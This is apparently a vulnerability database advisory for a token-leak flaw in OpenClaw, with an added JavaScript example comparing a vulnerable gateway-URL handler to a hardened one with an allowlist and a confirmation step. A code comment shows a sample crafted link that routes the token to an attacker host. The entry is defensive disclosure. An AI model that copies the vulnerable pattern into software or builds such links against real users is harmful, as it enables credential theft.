AVID-2026-R0217
Description
Vulnerability CVE-2026-25253
Details
OpenClaw (also known as clawdbot or Moltbot) before 2026.1.29 reads a gatewayUrl value from the page's query string and, without prompting the user, automatically opens a WebSocket connection to that URL and sends a token value over it. Because the query string is under the control of whoever crafts the link, a single click on a malicious URL is enough to direct the token to a gateway of the attacker's choosing.
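The pattern behind this entry, shown as an added example that is not OpenClaw's code and not taken from the advisory: a web UI that takes a gatewayUrl from its own query string and connects with a bearer token. The vulnerable helper trusts the parameter outright; the hardened helper parses it, accepts only ws/wss schemes, compares the origin against an operator-configured allowlist, and otherwise withholds the token until an explicit confirmation callback approves the origin. The allowlist entries, the function names, and the confirm hook are all assumptions made for the example; no real connection is opened.

```javascript
// Added example, not OpenClaw's code. TRUSTED_GATEWAYS is a constructed
// stand-in for gateways the operator configured out of band; the values
// are hypothetical and carry no meaning beyond this example.
const TRUSTED_GATEWAYS = ['ws://127.0.0.1:18789', 'wss://gateway.example.internal'];

// Vulnerable pattern: whatever gatewayUrl the page URL carries becomes the
// WebSocket target, and the token goes along with the first frame.
// A link such as https://ui.example/?gatewayUrl=wss://attacker.example/ws
// therefore hands the token to the attacker after one click.
function vulnerableConnectTarget(pageUrl, token) {
  const gatewayUrl = new URL(pageUrl).searchParams.get('gatewayUrl');
  if (!gatewayUrl) return null;
  return { url: gatewayUrl, token, prompted: false };
}

// Hardened pattern: the parameter is untrusted input. Parse it, restrict the
// scheme, match the origin against the allowlist, and require a user decision
// for anything else. The token is only attached to a 'connect' result.
function decideGatewayConnection(pageUrl, token, { confirm = () => false } = {}) {
  const raw = new URL(pageUrl).searchParams.get('gatewayUrl');
  if (raw === null) {
    return { action: 'default' }; // no override requested; use the built-in gateway
  }

  let parsed;
  try {
    parsed = new URL(raw);
  } catch {
    return { action: 'reject', reason: 'unparseable gatewayUrl' };
  }

  if (parsed.protocol !== 'ws:' && parsed.protocol !== 'wss:') {
    return { action: 'reject', reason: `unsupported scheme ${parsed.protocol}` };
  }

  // URL.origin normalises host and default ports for ws/wss, so the
  // comparison is not fooled by trailing slashes, paths or explicit :443.
  const origin = parsed.origin;
  const trusted = TRUSTED_GATEWAYS.some((t) => new URL(t).origin === origin);
  if (trusted) {
    return { action: 'connect', url: parsed.href, token, prompted: false };
  }

  // Unknown origin: ask before sending anything. confirm() stands in for a
  // real UI dialog; it receives the origin the user is being asked to trust.
  if (confirm(origin) === true) {
    return { action: 'connect', url: parsed.href, token, prompted: true };
  }
  return { action: 'prompt-declined', origin };
}

module.exports = { TRUSTED_GATEWAYS, vulnerableConnectTarget, decideGatewayConnection };
```

The important difference is not the allowlist itself but where the token lives: in the hardened helper no code path returns the token alongside an origin the operator or the user has not approved, so a crafted link can at most trigger a prompt naming the attacker's host.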
References
- NVD entry
- https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
- https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq
- https://openclaw.ai/blog
- https://ethiack.com/news/blog/one-click-rce-moltbot
- https://x.com/0xacb/status/2016913750557651228
- OpenClawCVEs repository
Affected or Relevant Artifacts
- Developer: OpenClaw
- Deployer: OpenClaw
- Artifact Details:
| Type | Name |
|---|---|
| System | OpenClaw |
Impact
AVID Taxonomy Categorization
- Risk domains: Security
- SEP subcategories: S0100: Software Vulnerability
- Lifecycle stages: L06: Deployment
CVSS
| Field | Value |
|---|---|
| Version | 3.1 |
| Vector String | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Base Score | 8.8 |
| Base Severity | 🔴 High |
| Attack Vector | NETWORK |
| Attack Complexity | 🟢 Low |
| Privileges Required | NONE |
| User Interaction | REQUIRED |
| Scope | UNCHANGED |
| Confidentiality Impact | 🔴 High |
| Integrity Impact | 🔴 High |
| Availability Impact | 🔴 High |
CWE
| ID | Description |
|---|---|
| CWE-669 | Incorrect Resource Transfer Between Spheres |
Other information
- Report Type: Advisory
- Credits:
- Date Reported: 2026-02-01
- Version: 0.3.2
- AVID Entry